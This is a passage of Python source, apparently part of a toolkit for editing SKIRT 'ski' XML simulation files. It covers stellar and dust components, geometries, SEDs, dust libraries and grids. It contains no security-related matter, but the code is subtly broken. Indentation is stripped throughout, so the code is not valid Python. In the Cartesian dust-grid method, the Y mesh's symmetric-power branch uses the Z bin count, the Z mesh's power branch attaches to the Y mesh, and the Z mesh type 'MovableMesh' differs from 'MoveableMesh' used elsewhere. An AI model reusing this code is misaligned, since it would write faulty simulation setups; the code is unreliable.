for attr in self.tree.xpath("//*/@extentZ"): attr.getparent().set("extentZ", strvalue)
## This function returns the stellar system
def get_stellar_system(self):
return self.get_unique_base_element("stellarSystem")
## This function returns the dust system
def get_dust_system(self):
return self.get_unique_base_element("dustSystem")
## This function removes the complete dust system
def remove_dust_system(self):
dust_system = self.get_dust_system()
parent = dust_system.getparent()
parent.getparent().remove(parent)
## This function returns the list of stellar components
def get_stellar_components(self, include_comments=False):
# Get the stellar system
stellar_system = self.get_stellar_system()
# Get the 'components' element
stellar_components_parents = stellar_system.xpath("components")
# Check if only one 'components' element is present
if len(stellar_components_parents) == 0: raise ValueError("Stellar system is not composed of components")
elif len(stellar_components_parents) > 1: raise ValueError("Invalid ski file: multiple 'components' objects within stellar system")
stellar_components = stellar_components_parents[0]
# Return the stellar components as a list
if include_comments: return stellar_components.getchildren()
else: return [component for component in stellar_components.getchildren() if component.tag is not etree.Comment]
## This function returns a list with the ids of the different stellar components (the id is a name if this is defined for the component, otherwise it is the index of the component)
def get_stellar_component_ids(self):
# Initialize a list to contain the component ids
ids = []
# Get the list of stellar components
components = self.get_stellar_components(include_comments=True)
# keep track of the number of actual components
number_of_components = 0
# Loop over the components (also includes the comments)
i = 0
while i < len(components):
if components[i].tag is etree.Comment:
ids.append(components[i].text.strip())
i += 2 # skip the next component -> it is the component corresponding to this comment
# No name -> add the index of this component as the ID
else:
ids.append(number_of_components)
i += 1
# Increment the number of components
number_of_components += 1
# Return the list of ids
return ids
## This function returns the dust distribution
def get_dust_distribution(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust distribution
return get_unique_element(dust_system, "dustDistribution")
## This function returns the list of dust components
def get_dust_components(self, include_comments=False):
# Get the dust distribution
dust_distribution = self.get_dust_distribution()
# Check whether the dust distribution is a CompDustDistribution
if not dust_distribution.tag == "CompDustDistribution": raise ValueError("Dust distribution is not composed of components")
# Get the 'components' element
dust_components_parents = dust_distribution.xpath("components")
# Check if only one 'components' element is present
if len(dust_components_parents) == 0: raise ValueError("Dust distribution is not composed of components")
elif len(dust_components_parents) > 1: raise ValueError("Invalid ski file: multiple 'components' objects within dust distribution")
dust_components = dust_components_parents[0]
# Return the dust components as a list
if include_comments: return dust_components.getchildren()
else: return [component for component in dust_components.getchildren() if component.tag is not etree.Comment]
## This function returns a list with the ids of the different dust components (the id is a name if this is defined
# for the component, otherwise it is the index of the component)
def get_dust_component_ids(self):
# Initialize a list to contain the component ids
ids = []
# Get the list of dust components
components = self.get_dust_components(include_comments=True)
# keep track of the number of actual components
number_of_components = 0
# Loop over the components (also includes the comments)
i = 0
while i < len(components):
if components[i].tag is etree.Comment:
ids.append(components[i].text.strip())
i += 2 # skip the next component -> it is the component corresponding to this comment
# No name -> add the index of this component as the ID
else:
ids.append(number_of_components)
i += 1
# Increment the number of components
number_of_components += 1
# Return the list of ids
return ids
## This function returns the stellar component that is recognized by the specified id (index or name)
def get_stellar_component(self, component_id):
# The component identifier is an integer number -> index of stellar components
if isinstance(component_id, int):
# Get all the stellar components (without comments)
components = self.get_stellar_components()
# Return the stellar component with the specified index
return components[component_id]
# The component identifier is a string -> get stellar component based on description
elif isinstance(component_id, basestring):
# Get the stellar components
components = self.get_stellar_components(include_comments=True)
# Loop over the different components
for child in components:
if child.tag is etree.Comment and child.text.strip() == component_id:
# Return the child element right after the comment element
return child.getnext()
# If no match is found, give an error
raise ValueError("No stellar component found with description '" + component_id + "'")
# Invalid component id
else: raise ValueError("Invalid component identifier (should be integer or string)")
## This function returns the dust component that is recognized by the specified id (index or name)
def get_dust_component(self, component_id):
# The component identifier is an integer number -> index of dust components
if isinstance(component_id, int):
# Get all the dust components (without comments)
components = self.get_dust_components()
# Return the dust component with the specified index
return components[component_id]
# The component identifier is a string -> get dust component based on description
elif isinstance(component_id, basestring):
# Get the dust components
components = self.get_dust_components(include_comments=True)
# Loop over the different components
for child in components:
if child.tag is etree.Comment and child.text.strip() == component_id:
# Return the child element right after the comment element
return child.getnext()
# If no match is found, give an error
raise ValueError("No dust component found with description '" + component_id + "'")
# Invalid component id
else: raise ValueError("Invalid component identifier (should be integer or string)")
## This function removes the stellar component with the specified ID
def remove_stellar_component(self, component_id):
# Get the stellar component with the specified ID
component = self.get_stellar_component(component_id)
# Get the previous item
previous = component.getprevious()
# Get the parent
parent = component.getparent()
# Check whether the previous item is a comment
if previous is not None and previous.tag is etree.Comment:
# If the comment states the component ID, remove it
if previous.text.strip() == component_id: parent.remove(previous)
# If the comment preceding the component does not state the name of that component (it must by definition),
# something strange is going on ...
else: raise ValueError("Something is wrong with the ski file")
# Remove the stellar component
parent.remove(component)
## This function removes the dust component with the specified ID
def remove_dust_component(self, component_id):
# Get the dust component with the specified ID
component = self.get_dust_component(component_id)
# Get the previous item
previous = component.getprevious()
# Get the parent
parent = component.getparent()
# Check whether the previous item is a comment
if previous is not None and previous.tag is etree.Comment:
# If the comment states the component ID, remove it
if previous.text.strip() == component_id: parent.remove(previous)
# If the comment preceding the component does not state the name of that component (it must by definition),
# something strange is going on ...
else: raise ValueError("Something is wrong with the ski file")
# Remove the dust component
parent.remove(component)
## This function removes the stellar components except for the component(s) with the specified ID(s)
def remove_stellar_components_except(self, component_ids):
if isinstance(component_ids, basestring): component_ids = [component_ids]
# Loop over the stellar component IDs
for id_i in self.get_stellar_component_ids():
# Skip IDs that are specified by the user
if id_i in component_ids: continue
# Remove all other stellar components
self.remove_stellar_component(id_i)
## This function removes the dust components except for the component(s) with the specified ID(s)
def remove_dust_components_except(self, component_ids):
if isinstance(component_ids, basestring): component_ids = [component_ids]
# Loop over the dust component IDs
for id_i in self.get_dust_component_ids():
# Skip IDs that are specified by the user
if id_i in component_ids: continue
# Remove all other dust components
self.remove_dust_component(id_i)
## This function returns all properties of the stellar component with the specified id
def get_stellar_component_properties(self, component_id):
# Get the stellar component
stellar_component = self.get_stellar_component(component_id)
# Get the properties
return get_properties(stellar_component)
## This function returns all properties of the dust component with the specified id
def get_dust_component_properties(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Get the properties
return get_properties(dust_component)
## This function returns the normalization of the stellar component with the specified id
def get_stellar_component_normalization(self, component_id):
# Get the stellar component
stellar_component = self.get_stellar_component(component_id)
# Get normalization of this component
return get_unique_element(stellar_component, "normalization")
## This function returns the luminosity of the stellar component with the specified id,
# - if the normalization is by bolometric luminosity, returns (luminosity [as Astropy quantity], None)
# - if the normalization is by luminosity in a specific band, returns (luminosity [as Astropy quantity], Filter object)
# - if the normalization is by spectral luminosity at a specific wavelength, returns (spectral luminosity [as Astropy quantity], wavelength [as Astropy quantity])
def get_stellar_component_luminosity(self, component_id):
# Get the stellar component normalization of the component
normalization = self.get_stellar_component_normalization(component_id)
# Check the type of the normalization
if normalization.tag == "BolLuminosityStellarCompNormalization":
# Return the total luminosity and None for the band
return get_quantity(normalization, "luminosity", default_unit="Lsun"), None
elif normalization.tag == "LuminosityStellarCompNormalization":
# Return the luminosity and the corresponding band
return get_quantity(normalization, "luminosity"), Filter.from_string(normalization.get("band"))
elif normalization.tag == "SpectralLuminosityStellarCompNormalization":
# The (spectral) luminosity
luminosity = get_quantity(normalization, "luminosity")
# The wavelength
wavelength = get_quantity(normalization, "wavelength")
# Return the luminosity and the wavelength as quantities
return luminosity, wavelength
## This function sets the luminosities of the stellar component with the specified id (for oligochromatic simulations)
def set_stellar_component_luminosities(self, component_id, luminosities):
# Get the stellar component normalization of the component
component = self.get_stellar_component(component_id)
# Set the 'luminosities' attribute
component.set("luminosities", " ".join(map(str, luminosities)))
## This function sets the luminosity of the stellar component with the specified id,
# - if filter_or_wavelength is None, the specified luminosity [as Astropy quantity] is interpreted as a bolometric luminosity
# - if filter_or_wavelength is a Filter instance, the luminosity [as Astropy quantity] is interpreted as the luminosity in the corresponding band
# - if filter_or_wavelength is a wavelength [as an Astropy quantity], the luminosity should be the spectral luminosity [as Astropy quantity] at that wavelength
def set_stellar_component_luminosity(self, component_id, luminosity, filter_or_wavelength=None):
# Get the stellar component normalization of the component
normalization = self.get_stellar_component_normalization(component_id)
# No filter or wavelength is defined, use BolLuminosityStellarCompNormalization
if filter_or_wavelength is None:
# Get element that holds the normalization class
parent = normalization.getparent()
# Remove the old normalization
parent.remove(normalization)
# Make and add the new normalization element
attrs = {"luminosity" : str_from_quantity(luminosity, unit="Lsun")}
parent.append(parent.makeelement("BolLuminosityStellarCompNormalization", attrs))
# Filter is defined, use LuminosityStellarCompNormalization
elif isinstance(filter_or_wavelength, Filter):
# Get element that holds the normalization class
parent = normalization.getparent()
# Remove the old normalization
parent.remove(normalization)
# Make and add the new normalization element
attrs = {"luminosity": str_from_quantity(luminosity), "band": filter_or_wavelength.skirt_description}
parent.append(parent.makeelement("LuminosityStellarCompNormalization", attrs))
# Wavelength is defined as an Astropy quantity, use SpectralLuminosityStellarCompNormalization
elif filter_or_wavelength.__class__.__name__ == "Quantity":
# Get element that holds the normalization class
parent = normalization.getparent()
# Remove the old normalization
parent.remove(normalization)
# Make and add the new normalization element
attrs = {"luminosity": str_from_quantity(luminosity), "wavelength": str_from_quantity(filter_or_wavelength)}
parent.append(parent.makeelement("SpectralLuminosityStellarCompNormalization", attrs))
# Invalid filter or wavelength argument
else: raise ValueError("Invalid filter or wavelength")
## This function returns the normalization of the dust component with the specified id
def get_dust_component_normalization(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Return the normalization
return get_unique_element(dust_component, "normalization")
## This function returns the dust mix for the dust component with the specified id
def get_dust_component_mix(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Return the dust mix
return get_unique_element(dust_component, "mix")
## This function sets a THEMIS dust mix model for the dust component with the specified id
def set_dust_component_themis_mix(self, component_id, hydrocarbon_pops=25, enstatite_pops=25, forsterite_pops=25, write_mix=True, write_mean_mix=True, write_size=True):
# Get the dust mix
mix = self.get_dust_component_mix(component_id)
# Get the parent
parent = mix.getparent()
# Remove the old mix
parent.remove(mix)
# Make and add the new mix
attrs = {"writeMix": str_from_bool(write_mix), "writeMeanMix": str_from_bool(write_mean_mix),
"writeSize": str_from_bool(write_size), "hydrocarbonPops": str(hydrocarbon_pops),
"enstatitePops": str(enstatite_pops), "forsteritePops": str(forsterite_pops)}
parent.append(parent.makeelement("ThemisDustMix", attrs))
## This function returns the mass of the dust component with the specified id, as an Astropy quantity
def get_dust_component_mass(self, component_id):
# Get the dust component normalization of the component
normalization = self.get_dust_component_normalization(component_id)
# Check if the normalization is of type 'DustMassDustCompNormalization'
if not normalization.tag == "DustMassDustCompNormalization": raise ValueError("Dust component normalization is not of type 'DustMassDustCompNormalization")
# Get the dust mass and return it as a quantity
return get_quantity(normalization, "dustMass")
## This function sets the mass of the dust component with the specified id. The mass should be an Astropy quantity.
def set_dust_component_mass(self, component_id, mass):
# Get the dust component normalization of the component
normalization = self.get_dust_component_normalization(component_id)
# Check if the normalization is of type 'DustMassDustCompNormalization'
if not normalization.tag == "DustMassDustCompNormalization": raise ValueError("Dust component normalization is not of type 'DustMassDustCompNormalization")
# Set the new dust mass
normalization.set("dustMass", str_from_quantity(mass))
## This function returns the wavelength grid
def get_wavelength_grid(self):
# Get the wavelength grid
return self.get_unique_base_element("wavelengthGrid")
## This function sets the number of wavelength points
def set_nwavelengths(self, value):
# Get the wavelength grid
grid = self.get_wavelength_grid()
# Set the number of points
grid.set("points", str(value))
## This function sets the wavelength grid to a file
def set_file_wavelength_grid(self, filename):
# Get the wavelength grid
wavelength_grid = self.get_wavelength_grid()
# Get the parent
parent = wavelength_grid.getparent()
# Remove the old wavelength grid
parent.remove(wavelength_grid)
# Make and add the new wavelength grid
attrs = {"filename": filename}
parent.append(parent.makeelement("FileWavelengthGrid", attrs))
## This function sets the wavelength grid to a NestedLogWavelengthGrid
def set_nestedlog_wavelength_grid(self, min_lambda, max_lambda, points, min_lambda_sub, max_lambda_sub, points_sub, write):
# Get the wavelength grid
wavelength_grid = self.get_wavelength_grid()
# Get the parent
parent = wavelength_grid.getparent()
# Remove the old wavelength grid
parent.remove(wavelength_grid)
# Make and add the new wavelength grid
attrs = {"minWavelength": str_from_quantity(min_lambda), "maxWavelength": str_from_quantity(max_lambda),
"points": str(points), "minWavelengthSubGrid": str_from_quantity(min_lambda_sub),
"maxWavelengthSubGrid": str_from_quantity(max_lambda_sub), "pointsSubGrid": str(points_sub),
"writeWavelengths": str_from_bool(write)}
parent.append(parent.makeelement("NestedLogWavelengthGrid", attrs))
## This function sets the wavelength grid to a LogWavelengthGrid
def set_log_wavelength_grid(self, min_lambda, max_lambda, points, write):
# Get the wavelength grid
wavelength_grid = self.get_wavelength_grid()
# Get the parent
parent = wavelength_grid.getparent()
# Remove the old wavelength grid
parent.remove(wavelength_grid)
# Make and add the new wavelength grid
attrs = {"minWavelength": str_from_quantity(min_lambda), "maxWavelength": str_from_quantity(max_lambda),
"points": str(points), "writeWavelengths": str_from_bool(write)}
parent.append(parent.makeelement("LogWavelengthGrid", attrs))
## This function returns the geometry of the stellar component with the specified id
def get_stellar_component_geometry(self, component_id):
# Get the stellar component
stellar_component = self.get_stellar_component(component_id)
# Return the geometry element of the stellar component
return get_unique_element(stellar_component, "geometry")
## This function returns the geometry of the dust component with the specified id
def get_dust_component_geometry(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Return the geometry element of the dust component
return get_unique_element(dust_component, "geometry")
## This function rotates the geometry of the specified stellar component
def rotate_stellar_component(self, component_id, alpha, beta, gamma):
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Get the geometry of the stellar component
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create the new rotated geometry
attrs = {"euleralpha": str_from_angle(alpha), "eulerbeta": str_from_angle(beta), "eulergamma": str_from_angle(gamma)}
new_geometry = parent.makeelement("RotateGeometryDecorator", attrs)
attrs = {"type": "Geometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add the original geometry that has to be rotated
geometry_of_new_geometry.append(geometry)
# Add the new geometry to the parent
parent.append(new_geometry)
## This function rotates the geometry of the specified dust component
def rotate_dust_component(self, component_id, alpha, beta, gamma):
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Get the geometry of the dust component
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create the new rotated geometry
attrs = {"euleralpha": str_from_angle(alpha), "eulerbeta": str_from_angle(beta), "eulergamma": str_from_angle(gamma)}
new_geometry = parent.makeelement("RotateGeometryDecorator", attrs)
attrs = {"type": "Geometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add the original geometry that has to be rotated
geometry_of_new_geometry.append(geometry)
# Add the new geometry to the parent
parent.append(new_geometry)
## This function sets the geometry of the specified stellar component to a FITS file
def set_stellar_component_fits_geometry(self, component_id, filename, pixelscale, position_angle, inclination, x_size, y_size, x_center, y_center, scale_height):
# Get the stellar component geometry
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"filename": filename, "pixelScale": str(pixelscale), "positionAngle": str_from_angle(position_angle),
"inclination": str_from_angle(inclination), "xelements": str(x_size), "yelements": str(y_size),
"xcenter": str(x_center), "ycenter": str(y_center), "axialScale": str(scale_height)}
new_geometry = parent.makeelement("ReadFitsGeometry", attrs)
parent.append(new_geometry)
## This function sets the geometry of the specified dust component to a FITS file
def set_dust_component_fits_geometry(self, component_id, filename, pixelscale, position_angle, inclination, x_size, y_size, x_center, y_center, scale_height):
# Get the dust component geometry
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"filename": filename, "pixelScale": str(pixelscale), "positionAngle": str_from_angle(position_angle),
"inclination": str_from_angle(inclination), "xelements": str(x_size), "yelements": str(y_size),
"xcenter": str(x_center), "ycenter": str(y_center), "axialScale": str(scale_height)}
new_geometry = parent.makeelement("ReadFitsGeometry", attrs)
parent.append(new_geometry)
## This function sets the geometry of the specified stellar component.
def set_stellar_component_geometry(self, component_id, model):
from astropy.coordinates import Angle
from ...modeling.basics.models import SersicModel, ExponentialDiskModel, DeprojectionModel
# Rotation:
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Sersic model
if isinstance(model, SersicModel):
# Set the Sersic geometry (with flattening)
self.set_stellar_component_sersic_geometry(component_id, model.index, model.effective_radius, z_flattening=model.flattening)
# Rotate the Sersic geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees, if beta is negative, rotate over z axis with 180 degrees first
alpha = Angle(180, "deg")
beta = - beta
self.rotate_stellar_component(component_id, alpha, beta, gamma)
# Exponential Disk
elif isinstance(model, ExponentialDiskModel):
# Set the exponential disk geometry
radial_scale = model.radial_scale
axial_scale = model.axial_scale
radial_truncation = model.radial_truncation
axial_truncation = model.axial_truncation
inner_radius = model.inner_radius
self.set_stellar_component_expdisk_geometry(component_id, radial_scale, axial_scale, radial_truncation, axial_truncation, inner_radius)
# Rotate the exponential disk geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees; if beta is negative, first rotate by 180 degrees about the z axis
alpha = Angle(180, "deg")
beta = - beta
self.rotate_stellar_component(component_id, alpha, beta, gamma)
# Deprojection model
elif isinstance(model, DeprojectionModel):
# Set the ReadFitsGeometry
filename = model.filename
scale = model.pixelscale
pa = model.position_angle
i = model.inclination
nx = model.x_size
ny = model.y_size
xc = model.x_center
yc = model.y_center
hz = model.scale_height
self.set_stellar_component_fits_geometry(component_id, filename, scale, pa, i, nx, ny, xc, yc, hz)
# Unsupported model
else: raise ValueError("Models other than SersicModel, ExponentialDiskModel and DeprojectionModel are not supported yet")
## This function sets the geometry of the specified dust component
def set_dust_component_geometry(self, component_id, model):
from astropy.coordinates import Angle
from ...modeling.basics.models import SersicModel, ExponentialDiskModel, DeprojectionModel
# Rotation:
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Sersic model
if isinstance(model, SersicModel):
# Set the Sersic geometry (with flattening)
self.set_dust_component_sersic_geometry(component_id, model.index, model.effective_radius, z_flattening=model.flattening)
# Rotate the Sersic geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees, if beta is negative, rotate over z axis with 180 degrees first
alpha = Angle(180, "deg")
beta = - beta
self.rotate_dust_component(component_id, alpha, beta, gamma)
# Exponential Disk
elif isinstance(model, ExponentialDiskModel):
# Set the exponential disk geometry
radial_scale = model.radial_scale
axial_scale = model.axial_scale
radial_truncation = model.radial_truncation
axial_truncation = model.axial_truncation
inner_radius = model.inner_radius
self.set_dust_component_expdisk_geometry(component_id, radial_scale, axial_scale, radial_truncation, axial_truncation, inner_radius)
# Rotate the exponential disk geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees; if beta is negative, first rotate by 180 degrees about the z axis
alpha = Angle(180, "deg")
beta = - beta
self.rotate_dust_component(component_id, alpha, beta, gamma)
# Deprojection model
elif isinstance(model, DeprojectionModel):
# Set the ReadFitsGeometry
filename = model.filename
scale = model.pixelscale
pa = model.position_angle
i = model.inclination
nx = model.x_size
ny = model.y_size
xc = model.x_center
yc = model.y_center
hz = model.scale_height
self.set_dust_component_fits_geometry(component_id, filename, scale, pa, i, nx, ny, xc, yc, hz)
# Unsupported model
else: raise ValueError("Models other than SersicModel, ExponentialDiskModel and DeprojectionModel are not supported yet")
## This function sets the geometry of the specified stellar component to a Sersic profile with a specific y and z flattening
def set_stellar_component_sersic_geometry(self, component_id, index, radius, y_flattening=1, z_flattening=1):
# Get the stellar component geometry
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"yFlattening": str(y_flattening), "zFlattening": str(z_flattening)}
new_geometry = parent.makeelement("TriaxialGeometryDecorator", attrs)
attrs = {"type": "SpheGeometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add sersic profile to the geometry
attrs = {"index": str(index), "radius": str(radius)}
sersic_geometry = geometry_of_new_geometry.makeelement("SersicGeometry", attrs)
geometry_of_new_geometry.append(sersic_geometry)
# Add the new geometry
parent.append(new_geometry)
## This function sets the geometry of the specified dust component to a Sersic profile with a specific y and z flattening
def set_dust_component_sersic_geometry(self, component_id, index, radius, y_flattening=1, z_flattening=1):
# Get the dust component geometry
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"yFlattening": str(y_flattening), "zFlattening": str(z_flattening)}
new_geometry = parent.makeelement("TriaxialGeometryDecorator", attrs)
attrs = {"type": "SpheGeometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add sersic profile to the geometry
attrs = {"index": str(index), "radius": str(radius)}
sersic_geometry = geometry_of_new_geometry.makeelement("SersicGeometry", attrs)
geometry_of_new_geometry.append(sersic_geometry)
# Add the new geometry
parent.append(new_geometry)
## This function sets the geometry of the specified stellar component to an exponential disk profile
def set_stellar_component_expdisk_geometry(self, component_id, radial_scale, axial_scale, radial_truncation=0, axial_truncation=0, inner_radius=0):
# Get the stellar component geometry
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new exponential disk geometry
attrs = {"radialScale": str(radial_scale), "axialScale": str(axial_scale), "radialTrunc": str(radial_truncation), "axialTrunc": str(axial_truncation), "innerRadius": str(inner_radius)}
new_geometry = parent.makeelement("ExpDiskGeometry", attrs)
# Add the new geometry
parent.append(new_geometry)
## This function sets the geometry of the specified dust component to an exponential disk profile
def set_dust_component_expdisk_geometry(self, component_id, radial_scale, axial_scale, radial_truncation=0, axial_truncation=0, inner_radius=0):
# Get the dust component geometry
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new exponential disk geometry
attrs = {"radialScale": str(radial_scale), "axialScale": str(axial_scale), "radialTrunc": str(radial_truncation), "axialTrunc": str(axial_truncation), "innerRadius": str(inner_radius)}
new_geometry = parent.makeelement("ExpDiskGeometry", attrs)
# Add the new geometry
parent.append(new_geometry)
## This function returns the SED template of the specified stellar component
def get_stellar_component_sed(self, component_id):
# Get the stellar component
component = self.get_stellar_component(component_id)
# Get the SED element
return get_unique_element(component, "sed")
## This function sets the SED template of the specified stellar component to a certain model with a specific age
# and metallicity (but not MAPPINGS SED)
def set_stellar_component_sed(self, component_id, template, age, metallicity):
# The name of the template class in SKIRT
template_class = template + "SED"
# Get the stellar component SED
sed = self.get_stellar_component_sed(component_id)
# Get the parent
parent = sed.getparent()
# Remove the old SED element
parent.remove(sed)
# Create and add the new SED element
attrs = {"age": str(age), "metallicity": str(metallicity)}
parent.append(parent.makeelement(template_class, attrs))
## This function sets a MAPPINGS SED template for the stellar component with the specified id
def set_stellar_component_mappingssed(self, component_id, metallicity, compactness, pressure, covering_factor):
# Get the stellar component SED
sed = self.get_stellar_component_sed(component_id)
# Get the parent
parent = sed.getparent()
# Remove the old SED element
parent.remove(sed)
# Create and add the new SED element
attrs = {"metallicity": str(metallicity), "compactness": str(compactness), "pressure": str_from_quantity(pressure), "coveringFactor": str(covering_factor)}
parent.append(parent.makeelement("MappingsSED", attrs))
## This function returns the dust emissivity
def get_dust_emissivity(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust emissivity element
return get_unique_element(dust_system, "dustEmissivity")
## This function sets a transient dust emissivity for the simulation
def set_transient_dust_emissivity(self):
# Get the dust emissivity
emissivity = self.get_dust_emissivity()
# Get the parent
parent = emissivity.getparent()
# Remove the old emissivity
parent.remove(emissivity)
# Create and add the new emissivity
parent.append(parent.makeelement("TransientDustEmissivity", {}))
## This function returns the dust library
def get_dust_lib(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust lib element
return get_unique_element(dust_system, "dustLib")
## This function sets the dust library to an AllCellsDustLib
def set_allcells_dust_lib(self):
# Get the dust lib
lib = self.get_dust_lib()
# Get the parent
parent = lib.getparent()
# Remove the old DustLib element
parent.remove(lib)
# Create and add the new library
parent.append(parent.makeelement("AllCellsDustLib", {}))
## This function sets the dust library to a 2D dust library
def set_2d_dust_lib(self, temperature_points=25, wavelength_points=10):
# Get the dust lib
lib = self.get_dust_lib()
# Get the parent
parent = lib.getparent()
# Remove the old DustLib element
parent.remove(lib)
# Create and add the new library
attrs = {"pointsTemperature": str(temperature_points), "pointsWavelength": str(wavelength_points)}
parent.append(parent.makeelement("Dim2DustLib", attrs))
## This function sets the dust library to a 1D dust library
def set_1d_dust_lib(self, points):
# Get the dust lib
lib = self.get_dust_lib()
# Get the parent
parent = lib.getparent()
# Remove the old DustLib element
parent.remove(lib)
# Create and add the new library
attrs = {"entries": str(points)}
parent.append(parent.makeelement("Dim1DustLib", attrs))
## This function returns the dust grid
def get_dust_grid(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust grid
return get_unique_element(dust_system, "dustGrid")
## This function sets the dust grid
def set_dust_grid(self, grid):
from ...modeling.basics.grids import BinaryTreeDustGrid, OctTreeDustGrid, CartesianDustGrid
if isinstance(grid, CartesianDustGrid):
# Set cartesian dust grid; set_cartesian_dust_grid below expects bin counts for x, y and z
# (this assumes the CartesianDustGrid object exposes a z_bins attribute alongside x_bins and y_bins)
self.set_cartesian_dust_grid(grid.min_x, grid.max_x, grid.min_y, grid.max_y, grid.min_z, grid.max_z,
grid.x_bins, grid.y_bins, grid.z_bins, grid.mesh_type, grid.ratio, grid.write)
elif isinstance(grid, BinaryTreeDustGrid):
# Set binary tree dust grid
self.set_binary_tree_dust_grid(grid.min_x, grid.max_x, grid.min_y, grid.max_y, grid.min_z, grid.max_z,
grid.write, grid.min_level, grid.max_level, grid.search_method,
grid.sample_count, grid.max_optical_depth, grid.max_mass_fraction,
grid.max_dens_disp_fraction, grid.direction_method)
elif isinstance(grid, OctTreeDustGrid):
# Set octtree dust grid
self.set_octtree_dust_grid(grid.min_x, grid.max_x, grid.min_y, grid.max_y, grid.min_z, grid.max_z,
grid.write, grid.min_level, grid.max_level, grid.search_method,
grid.sample_count, grid.max_optical_depth, grid.max_mass_fraction,
grid.max_dens_disp_fraction, grid.barycentric)
else: raise ValueError("Invalid grid type")
## This function sets a cartesian dust grid for the dust system
def set_cartesian_dust_grid(self, min_x, max_x, min_y, max_y, min_z, max_z, x_bins, y_bins, z_bins, mesh_type="linear", ratio=1., write_grid=True):
# Get the dust grid
grid = self.get_dust_grid()
# Get the parent
parent = grid.getparent()
# Remove the old grid element
parent.remove(grid)
# Create and add the new grid
attrs = {"minX": str_from_quantity(min_x), "maxX": str_from_quantity(max_x), "minY": str_from_quantity(min_y),
"maxY": str_from_quantity(max_y), "minZ": str_from_quantity(min_z), "maxZ": str_from_quantity(max_z),
"writeGrid": str_from_bool(write_grid)}
grid = parent.makeelement("CartesianDustGrid", attrs)
parent.append(grid)
# Create the X mesh
attrs = {"type": "MoveableMesh"}
x_mesh = grid.makeelement("meshX", attrs)
grid.append(x_mesh)
if mesh_type == "linear":
attrs = {"numBins": str(x_bins)}
x_mesh.append(x_mesh.makeelement("LinMesh", attrs))
elif mesh_type == "power":
attrs = {"numBins": str(x_bins), "ratio": str(ratio)}
x_mesh.append(x_mesh.makeelement("PowMesh", attrs))
elif mesh_type == "symmetric_power":
attrs = {"numBins": str(x_bins), "ratio": str(ratio)}
x_mesh.append(x_mesh.makeelement("SymPowMesh", attrs))
else: raise ValueError("Unrecognized mesh type")
# Create the Y mesh
attrs = {"type": "MoveableMesh"}
y_mesh = grid.makeelement("meshY", attrs)
grid.append(y_mesh)
if mesh_type == "linear":
attrs = {"numBins": str(y_bins)}
y_mesh.append(y_mesh.makeelement("LinMesh", attrs))
elif mesh_type == "power":
attrs = {"numBins": str(y_bins), "ratio": str(ratio)}
y_mesh.append(y_mesh.makeelement("PowMesh", attrs))
elif mesh_type == "symmetric_power":
attrs = {"numBins": str(z_bins), "ratio": str(ratio)}
y_mesh.append(y_mesh.makeelement("SymPowMesh", attrs))
else: raise ValueError("Unrecognized mesh type")
# Create the Z mesh
attrs = {"type": "MovableMesh"}
z_mesh = grid.makeelement("meshZ", attrs)
grid.append(z_mesh)
if mesh_type == "linear":
attrs = {"numBins": str(z_bins)}
z_mesh.append(z_mesh.makeelement("LinMesh", attrs))
elif mesh_type == "power":
attrs = {"numBins": str(z_bins), "ratio": str(ratio)}
y_mesh.append(z_mesh.makeelement("PowMesh", attrs))
elif mesh_type == "symmetric_power":
attrs = {"numBins": str(z_bins), "ratio": str(ratio)}
z_mesh.append(z_mesh.makeelement("SymPowMesh", attrs))
else: raise ValueError("Unrecognized mesh type")
## This function sets a binary tree dust grid for the dust system
